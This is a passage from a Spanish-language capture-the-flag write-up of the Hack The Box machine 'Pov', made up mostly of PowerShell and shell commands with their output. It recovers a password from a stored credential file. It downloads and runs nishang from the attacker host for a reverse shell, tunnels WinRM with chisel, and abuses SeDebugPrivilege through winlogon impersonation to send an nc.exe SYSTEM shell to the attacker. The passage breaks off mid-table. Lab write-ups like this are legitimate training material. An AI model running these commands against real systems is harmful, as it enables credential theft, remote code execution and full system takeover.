</span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv&gt; <span class="nv">$creds</span> <span class="o">=</span> Import-CliXml -Path C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments<span class="se">\c</span>onnection.xml </span></span><span class="line"><span class="cl">PS C:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv&gt; <span class="nv">$creds</span>.GetNetworkCredential<span class="o">()</span> <span class="p">|</span> fl * </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">UserName : alaading </span></span><span class="line"><span class="cl">Password : f8gQ8fynP44ek1m3 </span></span><span class="line"><span class="cl">SecurePassword : System.Security.SecureString </span></span><span class="line"><span class="cl">Domain : </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Aunque seria mas facil importar las credenciales y ejecutar un comando mediante una nueva sesion o en este caso un comando.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="nv">$creds</span> <span class="o">=</span> Import-Clixml -Path C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments<span class="se">\c</span>onnection.xml<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$session</span> <span class="o">=</span> New-PSSession -ComputerName pov -Credential <span class="nv">$creds</span><span class="p">;</span> </span></span><span class="line"><span class="cl">Invoke-Command -Session <span class="nv">$session</span> -ScriptBlock <span class="o">{</span> whoami <span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Tras la ejecucion observamos que tenemos acceso como alaading.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments&gt; <span class="nv">$creds</span> <span class="o">=</span> Import-Clixml -Path C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments<span class="se">\c</span>onnection.xml<span class="p">;</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments&gt; <span class="nv">$session</span> <span class="o">=</span> New-PSSession -ComputerName pov -Credential <span class="nv">$creds</span><span class="p">;</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments&gt; Invoke-Command -Session <span class="nv">$session</span> -ScriptBlock <span class="o">{</span> whoami <span class="o">}</span> </span></span><span class="line"><span class="cl">pov<span class="se">\a</span>laading </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---alaading">User - Alaading</h1> <p>Ejecutamos una shell inversa como alaading.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Invoke-Command -Session <span class="nv">$session</span> -ScriptBlock <span class="o">{</span> powershell.exe -c <span class="s2">&#34;iex(new-object net.webclient).downloadstring(&#39;http://10.10.14.151/nishang.ps1&#39;)&#34;</span> <span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Logramos acceso a este usuario y nuestra flag <code>user.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ rlwrap nc -lvp <span class="m">1335</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1335</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.151<span class="o">]</span> from pov.htb <span class="o">[</span>10.10.11.251<span class="o">]</span> <span class="m">49691</span> </span></span><span class="line"><span class="cl">Windows PowerShell running as user alaading on POV </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt;whoami </span></span><span class="line"><span class="cl">pov<span class="se">\a</span>laading </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../desktop </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\d</span>esktop&gt; dir </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\d</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 3/12/2024 4:21 PM <span class="m">34</span> user.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\d</span>esktop&gt; <span class="nb">type</span> user.txt </span></span><span class="line"><span class="cl">ab45154684439f6389b6b75f3a1f1973 </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\d</span>esktop&gt; </span></span></code></pre></td></tr></table> </div> </div><h1 id="privesc">Privesc</h1> <p>Observando la informacion de alaading se muestra el privilegio <code>SeDebugPrivilege</code> aunque este se muestra &ldquo;deshabilitado&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>laading<span class="se">\d</span>ocuments&gt; whoami /all </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">USER INFORMATION </span></span><span class="line"><span class="cl">---------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User Name <span class="nv">SID</span> </span></span><span class="line"><span class="cl"><span class="o">============</span> <span class="o">=============================================</span> </span></span><span class="line"><span class="cl">pov<span class="se">\a</span>laading S-1-5-21-2506154456-4081221362-271687478-1001 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GROUP INFORMATION </span></span><span class="line"><span class="cl">----------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Group Name Type SID <span class="nv">Attributes</span> </span></span><span class="line"><span class="cl"><span class="o">======================================</span> <span class="o">================</span> <span class="o">============</span> <span class="o">==================================================</span> </span></span><span class="line"><span class="cl">Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">BUILTIN<span class="se">\R</span>emote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">BUILTIN<span class="se">\U</span>sers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\N</span>ETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\A</span>uthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\T</span>his Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\L</span>ocal account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">NT AUTHORITY<span class="se">\N</span>TLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">Mandatory Label<span class="se">\M</span>edium Mandatory Level Label S-1-16-8192 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl">SeDebugPrivilege Debug programs Disabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Enabled </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ERROR: Unable to get user claims information. </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>laading<span class="se">\d</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="sedebugprivilege---winrm">SeDebugPrivilege - WinRM</h2> <p>Este token permitiria escalar privilegios (<a href="https://notes.morph3.blog/windows/privilege-escalation/sedebugprivilege">SeDebugPrivilege (1)</a>, <a href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#sedebugprivilege">SeDebugPrivilege (2)</a>), aunque al estar &lsquo;deshabilitado&rsquo; no es posible. Sin embargo <a href="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#check-privileges">Hacktricks</a> sugiere que es posible habilitar tokens que aparecen como deshabilitados y se refiere al script <a href="https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1">EnableAllTokenPrivs.ps1</a> y <a href="https://www.leeholmes.com/adjusting-token-privileges-in-powershell/">Set-TokenPrivilege.ps1</a>.</p> <p>Al intentar habilitar el token SeDebugPrivilege este no se activa.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; . .<span class="se">\E</span>nableAllTokenPrivs.ps1 </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl">SeDebugPrivilege Debug programs Disabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Enabled </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; . .<span class="se">\S</span>et-TokenPrivilege.ps1 </span></span><span class="line"><span class="cl">True </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">========</span> </span></span><span class="line"><span class="cl">SeDebugPrivilege Debug programs Disabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Enabled </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="chisel">Chisel</h3> <p>Intentamos ejecutar una shell con netcat pero no logramos habilitar ningun token, es por ello que ejecutamos chisel para tener acceso al servicio WinRM.</p> <p>Ejecutamos chisel localmente como servidor.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/www ❯ ./chisel_linux server -p <span class="m">7070</span> --reverse </span></span><span class="line"><span class="cl">2024/03/13 01:06:31 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2024/03/13 01:06:31 server: Fingerprint pMxMUMrsQj/0X0DXdF4jISWgi+Wdim0NDrclqWn3sKc<span class="o">=</span> </span></span><span class="line"><span class="cl">2024/03/13 01:06:31 server: Listening on http://0.0.0.0:7070 </span></span><span class="line"><span class="cl">2024/03/13 01:06:34 server: session#1: tun: proxy#R:127.0.0.1:1080<span class="o">=</span>&gt;socks: Listening </span></span></code></pre></td></tr></table> </div> </div><p>En la maquina realizamos la conexion con el servidor.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\p</span>ublic<span class="se">\d</span>ocuments&gt; ./chisel.exe client 10.10.14.151:7070 R:socks </span></span></code></pre></td></tr></table> </div> </div><p>Tras realizar la conexion observamos que el puerto WinRM esta abierto y es accesible.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/www ❯ proxychains4 -q nmap -p <span class="m">5985</span> 127.0.0.1 </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-03-13 01:07 EDT </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> localhost <span class="o">(</span>127.0.0.1<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.20s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">5985/tcp open wsman </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 0.46 seconds </span></span><span class="line"><span class="cl"> π ~/htb/www ❯ </span></span></code></pre></td></tr></table> </div> </div><p>Ejecutamos evil-winrm con las credenciales de alaading y tras realizar la conexion observamos que el token <code>SeDebugPrivilege</code> lo tenemos habilitado.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ proxychains4 -q evil-winrm -i 127.0.0.1 -u alaading -p f8gQ8fynP44ek1m3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">=======</span> </span></span><span class="line"><span class="cl">SeDebugPrivilege Debug programs Enabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Enabled </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="psgetsystem">PSGetSystem</h3> <p>Con el token habilitado verificamos el PID del proceso <code>winlogon</code> en el cual realizariamos un &lsquo;attach&rsquo; o &lsquo;impersonate user via parent process&rsquo;, esto ultimo lo realizamos con el script <code>psgetsys.ps1</code> en este caso ejecutamos una shell inversa con netcat.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; Get-Process winlogon </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Handles NPM<span class="o">(</span>K<span class="o">)</span> PM<span class="o">(</span>K<span class="o">)</span> WS<span class="o">(</span>K<span class="o">)</span> CPU<span class="o">(</span>s<span class="o">)</span> Id SI ProcessName </span></span><span class="line"><span class="cl">------- ------ ----- ----- ------ -- -- ----------- </span></span><span class="line"><span class="cl"> <span class="m">255</span> <span class="m">12</span> <span class="m">2656</span> <span class="m">16384</span> 0.58 <span class="m">548</span> <span class="m">1</span> winlogon </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; import-module .<span class="se">\p</span>sgetsys.ps1<span class="p">;</span> ImpersonateFromParentPid -ppid <span class="m">548</span> -command <span class="s2">&#34;c:\windows\system32\cmd.exe&#34;</span> -cmdargs <span class="s2">&#34;/c C:\Users\alaading\Documents\nc.exe 10.10.14.151 1339 -e cmd.exe&#34;</span> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\a</span>laading<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="shell">Shell</h3> <p>Por otro lado obtuvimos acceso como system y realizamos la lectura de nuestra flag <code>root.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ rlwrap nc -lvp <span class="m">1339</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1339</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.151<span class="o">]</span> from pov.htb <span class="o">[</span>10.10.11.251<span class="o">]</span> <span class="m">49706</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.5328<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;cd C:/users/administrator/desktop </span></span><span class="line"><span class="cl"><span class="nb">cd</span> C:/users/administrator/desktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;dir </span></span><span class="line"><span class="cl">dir </span></span><span class="line"><span class="cl"> Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is 0899-6CAF </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">01/15/2024 05:11 AM &lt;DIR&gt; . </span></span><span class="line"><span class="cl">01/15/2024 05:11 AM &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">03/12/2024 10:04 PM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> <span class="m">1</span> File<span class="o">(</span>s<span class="o">)</span> <span class="m">34</span> bytes </span></span><span class="line"><span class="cl"> <span class="m">2</span> Dir<span class="o">(</span>s<span class="o">)</span> 7,182,540,800 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;type root.txt </span></span><span class="line"><span class="cl"><span class="nb">type</span> root.txt </span></span><span class="line"><span class="cl">6c9074999656f6d68d7efa9bb7327971 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="sedebugprivilege---runascsmeterpreter">SeDebugPrivilege - RunasCs/Meterpreter</h2> <p>Como una forma alternativa en lugar de utilizar powershell para ejecutar comandos con las credenciales o acceso a WinRM utilizamos RunasCs.exe este permite ejecutar comandos o procesos con diferentes permisos, por el cual ejecutamos una shell inversa.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\p</span>ublic<span class="se">\d</span>ocuments&gt; .<span class="se">\R</span>unasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.151:1335 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Running in session <span class="m">0</span> with process <span class="k">function</span> CreateProcessWithLogonW<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Using Station<span class="se">\D</span>esktop: Service-0x0-b1174$<span class="se">\D</span>efault </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Async process <span class="s1">&#39;C:\Windows\system32\cmd.exe&#39;</span> with pid <span class="m">3932</span> created in background. </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\p</span>ublic<span class="se">\d</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>En esta shell observamos que el token no esta activado por lo que utilizamos <code>Set-TokenPrivilege.ps1</code> para habilitarlo el cual fue exitoso.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 